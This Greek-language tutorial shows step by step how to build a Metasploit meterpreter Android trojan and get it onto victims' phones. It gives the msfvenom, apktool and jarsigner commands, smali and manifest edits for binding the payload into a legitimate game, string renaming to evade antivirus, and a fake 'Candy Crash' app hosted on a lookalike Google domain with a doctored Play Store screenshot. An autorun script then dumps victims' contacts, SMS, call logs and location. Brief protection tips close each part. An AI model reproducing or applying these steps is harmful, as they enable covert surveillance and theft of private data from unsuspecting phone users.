Πως βαζουμε τον ιο μας σε οποιαδηποτε εφαρμογη Android (Advance Reverse Engineering)

Τι θα χρειαστειτε;

1.Kali Linux
2.Eclipse
3.Μια εφαρμογη Android


Σε προηγουμενο οδηγο μαθαμε πως να κανουμε εναν ιο για Android FUD (Fully Undetectable) και πως κλεβουμε επαφες,μηνυματα και κλησεις

Βεβαια το προβλημα ειναι οτι εφοσον το θυμα εκανε εγκατασταση του ιου μας μετα απο λιγο εκανε απεγκατασταση γιατι ο ιος σαν εφαρμογη δεν εδειχνε τιποτα στο θυμα.

Σε αυτο τον οδηγο θα μαθουμε πως βαζουμε τον ιο μας σε οποια εφαρμογη θελουμε

Πριν ξεκινησουμε πρεπει να κανουμε εγκατασταση του Eclipse

το Eclipse ειναι ενα προγραμμα το οποιο ειναι για προγραμματιστες εφαρμογων java,c++ κτλ

οποτε ας αρχισουμε

τρεχουμε την εντολη

apt-get install eclipse

οταν τελειωσουμε με την εγκατασταση γραφουμε στο τερματικο eclipse ωστε να μας ανοιξει

πηγαινουμε πανω αριστερα στην καρτελα Help και επιλεγουμε Install New Software

 

επιλεγουμε Add

στο Name βαζουμε Android και στο location

https://dl-ssl.google.com/android/eclipse/

επιλεγουμε τα πακετα ολα για εγκατασταση

 αποδεχομαστε τους ορους και επιλεγουμε να γινει εγκατασταση

οταν τελειωσει το eclipse το κλεινουμε και το ξανα ανοιγουμε
πηγαινουμε πανω δεξια στην καρτελα file και επιλεγουμε import
αν ολα ειναι ενταξει τοτε θα μας εμφανισει τον Android οπως κατω στην εικονα

τωρα εφοσον μπορουμε να εισαγουμε κωδικα εφαρμογης  Android στο Eclipse κατεβαζουμε τα εξεις

γραφουμε σε ενα τερματικο

cd Desktop

μετα

git clone https://github.com/nickthesail0r/AndroidPayload.git

και

git clone https://github.com/nickthesail0r/Metasploit-Binder.git

στην επιφανεια εργασιας μας θα δουμε 2 φακελους με τα ονοματα AndroidPayload και Metasploit-Binder

στο Eclipse επιλεγουμε πανω αριστερα File και Import

Android - Existing Android code into Workspace

 επιλεγουμε Browser και AndroidPayload

κανουμε και την ιδια διαδικασια με το metasploit-binder

στο Eclipse πρεπει να εχετε αυτα τα 2 Projects

πηγαινουμε στο AndroidPayload και με διπλο κλικ ανοιγουμε το Payload.java
και βαζουμε την ip και την θυρα που θελουμε να ακουει ο ιος μας

επιλεγουμε save και με δεξι κλικ πανω στο Project AndroidPayload επιλεγουμε export

επιλεγουμε Next

Εδω θα δημιουργησουμε το κλειδι της υπογραφης μας ωστε να υπογραφουμε τις εφαρμογες μας οποτε στο Location βαζουμε την τοποθεσια που θελουμε να αποθηκευτει και βαζουμε και κωδικο

 βαζουμε στο Allias το ψευδωνυμο μας ,κωδικο ,ποσα χρονια θελουμε να εχει η υπογραφη μας ισχυει και το ονομα μας

τελος βαζουμε το ονομα και την διαδρομη που θελουμε να αποθηκευτει η εφαρμογη μας

στην επιφανεια εργασια μας θα δουμε την εφαρμογη ios.apk

εδω ανοιγουμε το Armitage το βαζουμε να ακουει στην θυρα που βαλαμε στον ιο και τρεχουμε τον ιο στο κινητο μας

πρεπει να δουμε το κινητο σαν slave

(αν δεν σας εμφανιστει  τοτε εχετε κανει λαθος στην θυρα η στην ip)

τωρα απο το κινητο μας κανουμε εγκατασταση το ES Διαχειριστης Αρχειων

μετα επιλεγουμε την εφαρμογη που θελουμε να βαλουμε τον ιο μας

πχ εγω σε αυτο το παραδειγμα πηρα το παιχνιδι Space Agency

οταν το κανουμε εγκατασταση ανοιγουμε το ES

και επιλεγουμε app ,βρισκουμε το Space Agency και παταμε για 3 δευτερολεπτα πανω στο εικονιδιο μεχρι να μας εμφανιστει το ποιο κατω menu ωστε να το κανουμε backup

τωρα συνδεουμε με καλωδιο το κινητο με τον υπολογιστη, πηγαινουμε στον φακελο Phone/Backups/apps και μεταφερουμε το Space Agency στον υπολογιστη μας

οταν εχουμε το Space Agency στην επιφανεια εργασιας μας τοτε το κανουμε Decompliled με το apktool

οποτε τρεχουμε την εντολη
apktool.jar d "/root/Desktop/Space Agency_1.4.4.apk"
(η apktool αν εχετε την παλια εκδοση)

το apktool μας εκανε decompiled το Space Agency στην επιφανεια εργασιας
πηγαινουμε στον φακελο και ανοιγουμε το AndroidManifest.xml

σημειωνουμε το ονομα πακετου της εφαρμογης (package name) και της πρωτης δραστηριοτητας(Activity)

πχ

τωρα πηγαινουμε στο Eclipse στο Project Binder και ανοιγουμε το StartUpActivity,java και βαζουμε τα πακετα απο το AndroidManifest.xml

πχ

αποθηκευουμε και κανουμε export της εφαρμογης binder

παλι η ιδια διαδικασια

εκτος απο εδω που επιλεγουμε την υπογραφη που φτιαξαμε πριν
βαζουμε τον κωδικο

επιλεγουμε το ψευδωνυμο και βαζουμε κωδικο

βαζουμε το ονομα και την διαδρομη που θελουμε να εξαγουμε την εφαρμογη

τωρα εφοσον στην επιφανεια εργασιας εχουμε το binder.apk θα το κανουμε decompiled με το apktool

οποτε  τρεχουμε την εντολη

apktool.jar d /root/Desktop/Binder.apk

μετα θα κανουμε decompiled τον ιο

τρεχουμε την εντολη

apktool.jar d /root/Desktop/ios.apk

τωρα εφοσον και οι 3ς εφαρμογες εχουν γινει decompiled στην επιφανεια  εργασιας

πηγαινουμε σον φακελο ios/smali/com και αντιγραφουμε τον φακελο app

μετα πηγαινουμε στον φακελο Space Agency_1.4.4/smali/com/ και κανουμε επικολληση

πηγαινουμε στον φακελο Binder/smali/com/app και κανουμε αντιγραφη του φακελου bind

μετα πηγαινουμε παλι στον φακελο Space Agency_1.4.4/smali/com/app/ και κανουμε επικολληση

δλδ η εφαρμογη σας πρεπει να εχει μεσα τους φακελους bind και stage στην διαδρομη efarmoghsas/smali/com/app/

τωρα ανοιγουμε το AndroidManifest.xml στον φακελο ios και κανουμε αντιγραφη τα δικαιωματα (permissions)

στο AndroidManifest.xml του Space Agency τα κανουμε επικολληση

μετα τελος στο </activity>

προσθετουμε

<activity android:label="hello" android:name="com.app.stage.MainActivity" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>
<activity android:label="@string/app_name" android:name="com.app.bind.StartUpActivity" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>

και αφαιρουμε απο το κανονικο <activity>

στο <intent-filter>

<category android:name="android.intent.category.LAUNCHER"/>

με λιγα λογια να υπαρχει ενα LAUNCHER το οποιο θα το ξεκιναει τo StartUpActivity

τωρα αποθηκευουμε και κανουμε compiled την εφαρμογη με την εντολη

apktool.jar b '/root/Desktop/Space Agency_1.4.4'

και την υπογραφουμε με την εντολη

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/Desktop/ypografi '/root/Desktop/Space Agency_1.4.4/dist/Space Agency_1.4.4.apk' nickthesail0r

και ειμαστε ετοιμοι να στειλουμε την εφαρμογη στο θυμα μας

η εφαρμογη βρισκετε στην διαδρομη Space Agency_1.4.4/dist/

τωρα πως θα στειλετε στο θυμα την εφαρμογη μπορειτε να δειτε τον προηγουμενο οδηγο μου

οταν το θυμα τρεξει την εφαρμογη δεν θα καταλαβει τιποτα γιατι θα του τρεχει κανονικα η εφαρμογη

και εσεις θα δειτε το θυμα σας στο armitage

Θελω να ευχαριστησω τον theDoubleKay για τον κωδικα του binder και γενικα την βοηθεια του.

Πως θα προστατευτειτε;

1.Ποτε μην κανετε εγκατασταση εφαρμογων απο αγνωστες πηγες 
2.Παντα να εχετε καποιο antivirus στο κινητο σας
3.Οταν ειναι να κανετε εγκατασταση ακομα και  μιας εφαρμογης απο το playstore να κοιτατε αν εχει πανω απο 100 χιλιαδες ληψεις και αν ειναι πανω απο 30 μερες αν εχει κατω απο 30 μερες και εχει περιεργα δικαιωματα μην την κανετε εγκατασταση

Πως κλεβουμε επαφες,μηνυματα και τηλεφωνικες κλησεις απο το κινητο ενος στοχευμενου χρηστη

Τι θα χρειαστειτε;

1.Kali Linux 2.0
2.Eνα δωρεαν domain

Κανουμε εγγραφη ενος domain πχ πατηστε εδω
οταν τελειωσουμε με την εγγραφη τοτε πηγαινουμε και γραφουμε τι ονομα θελουμε να εχει το domain μας

πχ 

το ονομα που εδωσα στο domain μου ειναι googleapps-store.ga
εσεις βαζετε οτι θελετε
οταν κανετε checkout κτλ πηγαινουμε στα domains , Mydomains και επιλεγουμε  Manage Domain

μετα

βαζουμε την εξωτερικη μας ip και επιλεγουμε save changes

τωρα  αυτο που καναμε ειναι
οταν καποιος παει στο http://googleapps-store.ga
θα κατευθυνετε στην εξωτερικη μας ip

συνεχιζουμε

ανοιγουμε ενα τερματικο και γραφουμε

service postgresql start

μετα επιλεγουμε το εικονιδο του armitage αριστερα της οθονης

 επιλεγουμε connect

 επιλεγουμε yes

 περιμενουμε να μας ανοιξει

 οταν μας ανοιξει το armitage στην αναζητηση γραφουμε
 android reverse_tcp

επιλεγουμε με διπλο κλικ meterpreter reverse_tcp

στο LHOST βαζουμε το ονομα του domain που φτιαξαμε και μια θυρα που θελουμε να επικοινωνει στο output βαζουμε raw και επιλεγουμε Launch

δινουμε ενα ονομα πχ ios.apk και επιλεγουμε save

το armitage εχει φτιαξει την ιο στην διαδρομη Home(root)

ξανα επιλεγουμε android meterpreter reverse_tcp και βαζουμε μονο την θυρα που βαλαμε οταν φτιαξαμε τον ιο πχ 8888 και επιλεγουμε Launch

και το armitage ακουει για καποια συνδεση

τωρα αν μεταφερετε τον ιο στην συσκευη και το τρεξετε σας θα δειτε οτι εμφανιζετε ενα αχαρο εικονιδιο συν αν εχετε καποιο antivirus θα σας το βγαλει σαν ιο .

πχ

οι πληροφοριες που μας βγαζει το antivirus

και βλεπετε οτι 30 απο τα 35 antivirus βρισκουνε τον ιο μας

αν δεν εχουμε καποιο antivirus και παμε να κανουμε την εγκατασταση

τοτε θα δουμε αυτο

οταν τελειωσετε με την εγκατασταση τοτε θα δειτε αυτο

αν το τρεξετε θα δειτε οτι δεν σας ανοιγει κατι αλλα σας εμφανιζει στο armitage το κινητο σας

οπως καταλαβαινετε σε πραγματικες συνθηκες το θυμα σας δεν θα το τρεξει καν

οποτε για να λυσουμε αυτο το προβλημα θα εφαρμοσουμε αντιστροφη μηχανικη

το εργαλειο που θα χρησιμοποιησουμε ειναι το apktool

το apktool ειναι ενα εργαλειο το οποιο κανει αποσυμπιληση και συμπιληση σε εφαρμογες android ωστε να δειτε  ενμερη τον κωδικα και να τον τροποποιησετε

οποτε περνουμε το αρχειο ios.apk που εχουμε φτιαξει

(αν θελετε μπορειτε να φτιαξετε γρηγορα με την εντολη 

msfvenom -p android/meterpreter/reverse_tcp --platform android --arch dalvik LHOST="googleapps-store.ga" LPORT=8888 R > ios.apk )

οποτε τωρα για να κανουμε αποσυμπιληση(decompiled) του αρχειου γραφουμε

apktool.jar d ios.apk  η (apktool d ios.apk)

*αν εχετε προβλημα με το apktool τοτε ακολουθηστε αυτο τον οδηγο εδω

 στην διαδρομη Home(root) μας δημιουργησε εναν φακελο με το ονομα ios

εμεις τωρα για να παρακαμψουμε το antivirus θα παμε στον φακελο smali - metasploit και θα αλλαξουμε το ονομα απο metasploit σε οτι θελουμε πχ κατι που να συσχετιζει την εφαρμογη μας αν δεν εχετε αποφασισει ονομαστε το app

τωρα πηγαινουμε στον φακελο stage

εδω θα ανοιξουμε ενα ενα ολα τα αρχεια με leafpad και θα αλλαξουμε το metasploit σε app πχ

και

για να το κανουμε αυτο ποιο γρηγορα ανοιγουμε με leafpad ενα ενα τα αρχεια .smali παταμε ctrl+r γραφουμε πανω metasploit απο κατω app επιλεγουμε Replace all at once μετα find and Replace επειτα παταμε ctrl+s για να αποθηκευση και ctrl+q για να κλεισει το κανουμε σε ολα τα αρχεια που βρισκοντε στον φακελο stage

οταν τελειωσουμε παμε στον αρχικο φακελο ios και ανοιγουμε το αρχειο androidmanifest.xml και αλλαζουμε παλι  metasploit σε app

με αυτο τον τροπο οταν συμπιλησουμε (compiled)την εφαρμογη τοτε θα εχουμε παρακαμψει ολα τα antivirus

τωρα μας μενει να αλλαξουμε το εικονιδιο και το ονομα της εφαρμογης ωστε να ειναι ποιο πειστικη

καθως εχουμε ανοικτο το androidmanifest.xml

κανουμε τις εξεις αλλαγες

<application android:label="@string/app_name">

σε

<application android:label="Candy Crash" android:icon="@drawable/icon">

και 

<activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay"> 

σε

<activity android:label="Candy Crash" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay"> 

αποθηκευουμε και κλεινουμε το androidmanifest.xml

πηγαινουμε στον φακελο res και δημιουργουμε

3ς φακελους με τα εξεις ονοματα

drawable-hdpi-v4
drawable-ldpi-v4
drawable-mdpi-v4

μεσα στους φακελους θα βαλουμε την εικονα που θελουμε να δειχνει η εφαρμογη μας πχ

στον φακελο drawable-mdpi-v4 η εικονα που πρεπει να βαλουμε πρεπει να εχει ονομα icon.png και να εχει διαστασεις 48x48

στον φακελο drawable-ldpi-v4 36x36

και στον φακελο  drawable-hdpi-v4 72x72

για να το κανουμε αυτο εφοσον ονομασαμε την εφαρμογη μας Candy crash κανουμε αναζητηση για εικονες Candy crash σε .png και τις διαστασεις

πχ

 γραφουμε candy crash.png και επιλεγουμε εικονες

μετα πηγαινουμε στα εργαλεια αναζητησης επιλεγουμε μεγεθος και ακριβως

βαζουμε τις διαστασεις και κατεβαζουμε την εικονα
της αλλαζουμε ονομα σε icon.png και την αποθηκευουμε στον αναλογο φακελο

τωρα ειμαστε ετοιμοι να κανουμε compiled τον ιο

για να το κανουμε αυτο

τρεχουμε την εντολη

apktool.jar b /root/ios

τωρα για να μπορεσει καποιος να τρεξει την εφαρμογη μας πρεπει να την υπογραψουμε

πριν την υπογραψουμε πρεπει να δημιουργησουμε την ψηφιακη μας υπογραφη

τρεχουμε την εντολη


keytool -genkey -v -keystore ypografh.keystore -alias nickthesail0r -keyalg RSA -keysize 2048 -validity 10000

τα κοκκινα γραμματα τα αλλαζετε

θα μας ζητησει να βαλουμε κωδικο και μετα τα στοιχεια της υπογραφης πχ ονομα,χωρα,οργανισμο κτλ οταν τελειωσετε γραφετε yes και enter

στην διαδρομη Home(root) θα σας εχει δημιουργηθει το αρχειο ypografh.keystore

τωρα εφοσον φτιαξαμε την υπογραφη πρεπει να υπογραψουμε την εφαρμογη ios.apk

οποτε τρεχουμε την εντολη 

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore ypografh.keystore /root/ios/dist/ios.apk nickthesail0r

βαζουμε τον κωδικο που βαλαμε οταν φτιαξαμε την υπογραφη και υπογραφουμε την εφαρμογη

εχουμε τελειωσει τον ιο θα τον βρουμε στην διαδρομη /root/ios/dist/

αν θελετε τρεξτε το αρχειο για να δειτε αν δεν εχετε κανει καποιο λαθος κτλ

τωρα μας μενει να εφαρμοσουμε κοινωνικη μηχανικη

αλλαζουμε τo αρχειο ios.apk  σε candycrash.apk πχ

και με την εντολη mv /root/ios/dist/candycrash.apk /var/www/html το μεταφερουμε στην διαδρομη του apache server μας

μετα γραφουμε στο τερματικο leafpad /var/www/html/index.html

και γραφουμε τον παρακατω κωδικα html

<html><head></script></head><div align="center" id="flashDiv" style="position:absolute; top:0%; left:0%; z-index:1;"><a target="_blank" href="http://googleapps-store.ga/ios.apk">
<img src="http://googleapps-store.ga/1.jpg"><meta name="viewport" content="width=device-width" content="hight=device-hight" scale=user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true"></a>
</div></html>

αποθηκευουμε

απο το κινητο μας πηγαινουμε στο play store και κανουμε αναζητηση candy crash

και παιρνουμε ενα στιγμιοτυπο της οθονης μας πχ

τις μεταφερουμε στον υπολογιστη μας

κανουμε εγκατασταση του GIMP (προγραμμα επεξεργασιας φωτογραφιων)

apt-get install gimp

οταν γινει η εγκατασταση ανοιγουμε την εικονα με το gimp

και προσεκτικα σβηνουμε οτι προδιδει οτι ειναι τραβηγμενο απο κινητο

μεχρι να εχουμε περιπου το παρακατω αποτελεσμα

αποθηκευουμε σε 1.jpg και το μεταφερουμε στην διαδρομη /var/www/html/

τωρα σηκωνουμε τον apache server μας με την εντολη

service apache2 start

οταν γραψουμε το domain μας πχ http://googleapps-store.ga στο κινητο μας πρεπει να μας εμφανισει  αυτο

*μην ξεχασετε να εχετε προωθησει στο router σας την θυρα 80 για τον apache web server και 8888 που θα ακουει το armitage

πριν το στειλουμε στο θυμα μας γραφουμε την εντολη

leafpad entoles.rc

και βαζουμε μεσα τις παρακατω εντολες

dump_calllog
dump_contacts
dump_sms
wlan_geolocate

αποθηκευουμε μετα παμε στο armitage και γραφουμε
 
set AutoRunScript multi_console_command -rc /root/entoles.rc

μετα στην διπλα καρτελα που ακουει για το θυμα γραφουμε rexploit -j

το θυμα οταν τρεξει τον ιο αυτοματα το armitage θα εκτελεσει τις ποιο πανω εντολες που βαλαμε στο αρχειο entoles.rc ετσι θα εχουμε παρει γρηγορα τις επαφες ,τα sms ,τις τηλεφωνικες κλησεις του και την τοποθεσια που βρισκετε το θυμα

*εσεις μπορειτε να βαλετε οτι θελετε πχ να παρετε καποιο αρχειο,να ηχογραφησετε ,να παρετε καποια ληψη απο την καμερα κτλ

τωρα το στελνετε στο θυμα ΟΤΑΝ δειτε οτι στην συνομιλια στο facebook λεει οτι ειναι συνδεδεμενος απο κινητο

Δειγμα περιπου πως θα το πλασαρετε στο θυμα

το θυμα παει στην σελιδα, οπουδηποτε και να πατησει θα του κατεβει ο ιος

oταν παει να κανει εγκατασταση θα δει αυτο

και οταν το τρεξει τοτε θα δειτε το θυμα στο armitage

αυτοματα εχετε παρει ηδη επαφες,μνμ,κλησεις και τοποθεσια

οι επαφες, μνμ ,κλησεις κτλ αποθηκευονται στην διαδρομη

/usr/share/armitage

πχ το αρχειο κλησεων

μετα εδω μπορειτε να κανετε οτι θελετε βεβαια το θυμα θα διαγραψει την εφαρμογη εφοσον δεν θα εχει καποια χρηση κτλ
ομως εσεις την κανατε την δουλεια σας

Σε αυτο τον οδηγο απλα μαθαμε πως να κανουμε στην ουσια εναν ιο  να φαινεται πειστικος ,σε επομενο οδηγο θα μαθουμε πως κανουμε inject σε οποια εφαρμογη θελουμε.
 
Πως θα προστατευτειτε;

Ποτε μην κανετε εγκατασταση εφαρμογων απο αγνωστες πηγες
Βεβαια ακομα και να κανετε εγκατασταση καποιας εφαρμογης απο το
play store παντα να κοιτατε τι δικαιωματα εχει η εφαρμογη πχ μια εφαρμογη αριθμομηχανης δεν πρεπει να εχει δικαωματα να κανει αναγνωση βιντεο , φωτογραφιων να κοιταει κλησεις,μνμ κτλ

Αυτο το κομματι θα το δουμε σε επομενο οδηγο